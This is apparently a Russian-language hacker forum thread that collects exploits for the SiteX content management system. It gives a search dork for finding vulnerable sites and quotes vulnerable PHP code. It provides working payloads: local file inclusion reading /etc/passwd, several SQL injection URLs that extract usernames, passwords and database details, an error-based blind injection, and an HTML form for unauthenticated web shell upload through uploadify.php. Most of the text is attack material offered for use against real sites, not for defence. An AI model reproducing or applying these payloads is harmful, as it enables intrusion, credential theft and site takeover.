Уязвимости SiteX 0.7 Beta

download: http://jaist.dl.sourceforge.net/sourceforge/sitex/SiteX_074_build_418.zip

dork: "Powered by SiteX 0.7 Beta"
(выдачу гугла больше 10 линков не ставьте ;) )

1) [LFI] (требования: magic_quotes=off, register_globals=on)

/themes/Corporate/homepage.php
уязвимый код:

include("themes/$THEME_FOLDER/header.php");

эксплуатирование:
/themes/Corporate/homepage.php?THEME_FOLDER=../../../../../../../../etc/passwd%00


2) [SQL-injection] (требования: magic_quotes=off, register_globals=on)

links.php
уязвимый код:
if($category)
{
$query = "SELECT * FROM $DB_Links_Groups WHERE id='$category'";
$result = mysql_query($query, $Link) or queryError("8", mysql_error());

эксплуатирование:
/links.php?category=-1'+union+select+1,concat_ws(0x3a,username,password ),3+from+sitex_users--+


P.S:
шелл в админке аплоадится без проблем

1) [LFI] требования: magic_quotes=off не обязательно ;)

2 geezer.code
не на всех сайтах получается реализовать, поэтому как требование поставил =)

Уязвимости SiteX 0.7 Beta

Product : SiteX 0.7.4 build 405

PHPinfo
http://localhost/setup/phpinfo.php

LFI
include("themes/$THEME_FOLDER/header.php");
magic_quotes=off
register_globals=on
results :
http://localhost//themes/Fusion/homepage.php?THEME_FOLDER=../../../[...]%00
http://localhost//themes/Joombo/homepage.php?THEME_FOLDER=../../../[...]%00
http://localhost//themes/Streamline/homepage.php?THEME_FOLDER=../../../[...]%00
http://localhost//themes/Structure/homepage.php?THEME_FOLDER=../../../[...]%00



SQL Injection
magic_quotes=off, register_globals=on
photo.php
$query = "SELECT * FROM $DB_Photos WHERE id='$photoid'";
$result = mysql_query($query, $Link) or queryError("11", mysql_error());
$sxPhoto = mysql_fetch_object($result);

$sxNewViews = $sxPhoto->views + 1;

$sxQuery2 = "UPDATE $DB_Photos SET views='$sxNewViews' WHERE id='$photoid'";
$sxResult2 = mysql_query($sxQuery2, $Link) or queryError("10", mysql_error());

$queryA = "SELECT * FROM $DB_Photos_Albums WHERE id='$albumid'";
$resultA = mysql_query($queryA, $Link) or queryError("12", mysql_error());
$ROWA = mysql_fetch_object($resultA);
result :
http://localhost/photo.php?photoid=4&albumid=1'+and+1=0+union+all+select+1,version(),3, 4,5,6,7,8--+

SQL injection in Admin Panel
magic_quotes=off, register_globals=on
admin/page_edit.php
$result = mysql_query($query, $Link) or queryError("38", mysql_error());

$query = "DELETE FROM $DB_Pages_Private WHERE pageid='$pageid'";
$result = mysql_query($query, $Link) or queryError("38", mysql_error());

if($private)
{
foreach ($user_types as $k => $v)
{
$query = "INSERT INTO $DB_Pages_Private (pageid, typeid) VALUES ('$pageid', '$k')";
$result = mysql_query($query, $Link) or queryError("38", mysql_error());
}
}

header("Location: ../page.php?pageid=$pageid&message=".str_replace(" ","_",$sxLang['MessagePageEdited']));
die();
}

$query = "SELECT * FROM $DB_Pages WHERE id='$pageid'";
result :
http://localhost/admin/page_edit.php?pageid=1'+and+1=0+union+all+select+1 ,version(),3,4,5,6,7--+
admin/journal_edit.php
$query = "UPDATE $DB_Journal SET title='$title', entry='$content', timestamp='$timestamp', month='$date_month', day='$date_day', year='$date_year' WHERE id='$entryid'";
$result = mysql_query($query, $Link) or queryError("21", mysql_error());

writeRSSXML();

header("Location: ../journal.php?sxEntryID=$entryid&message=".str_replace(" ","_",$sxLang['MessageJournalEdited']));
die();
//$message = $sxLang['MessageJournalEdited'];
}

$query = "SELECT * FROM $DB_Journal WHERE id='$entryid'";
$result = mysql_query($query, $Link) or queryError("21", mysql_error());
$ROW = mysql_fetch_object($result);
result :
http://localhost/admin/journal_edit.php?entryid=1'+and+1=0+union+all+sele ct+1,version(),3,4,5,6,7,8--+

5 копеек..)

-------

1) SQL injection(требования: mq=off, любой акк)

file:/admin/profile_view.php


$query2 = "SELECT * FROM $DB_Users, $DB_Users_Assoc, $DB_Users_Types
WHERE $DB_Users.username='$user' AND
$DB_Users.id=$DB_Users_Assoc.userid AND
$DB_Users_Assoc.typeid=$DB_Users_Types.id";
$result2 = mysql_query($query2, $Link) or queryError("402", mysql_error());


result:

/admin/profile_view.php?user=-123456'+union+select+1,User(),3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19+--+


2)blind SQL injection(требования: mq=off,желательно 5 ветка бд)

file: /forums_topic.php


$query = "SELECT * FROM $DB_Forums_Posts WHERE id='$topicid'";
$result = mysql_query($query, $Link) or queryError("71", mysql_error());


result:

/forums_topic.php?topicid=1'+and+(1,2)in(select/**/*/**/from(select/**/name_const(version(),1),name_const(version(),1))as/**/a)+--+

//много скуль..

Внесу свой посильный вклад.

[Version 0.8.0 RC 3 build 524]

Заливка шела. Не требуеться ни прав, ни авторизации, ни чего то еще.

File: includes/uploadify/uploadify.php


if (!empty($_FILES)) {
$tempFile = $_FILES['Filedata']['tmp_name'];
$targetPath = $_SERVER['DOCUMENT_ROOT'] . $_REQUEST['folder'] . '/';
$targetFile = str_replace('//','/',$targetPath) . $_FILES['Filedata']['name'];

// $fileTypes = str_replace('*.','',$_REQUEST['fileext']);
// $fileTypes = str_replace(';','|',$fileTypes);
// $typesArray = split('\|',$fileTypes);
// $fileParts = pathinfo($_FILES['Filedata']['name']);

// if (in_array($fileParts['extension'],$typesArray)) {
// Uncomment the following line if you want to make the directory if it doesn't exist
// mkdir(str_replace('//','/',$targetPath), 0755, true);

move_uploaded_file($tempFile,$targetFile);
echo "1";
// } else {
// echo 'Invalid file type.';
// }
}


Target:
Exploit ^_^

<form enctype="multipart/form-data" action="http://targethost.com/includes/uploadify/uploadify.php" method="post" >
<input type="file" name="Filedata" /><input type="submit" />
<input type="text" name="folder" />
</form>


Если же, начальник сайта, раскомментирует по дефолту закомментированые строчки, то допустимые расширения для файлов,можно будет передать в параметре fileext, записав туда .php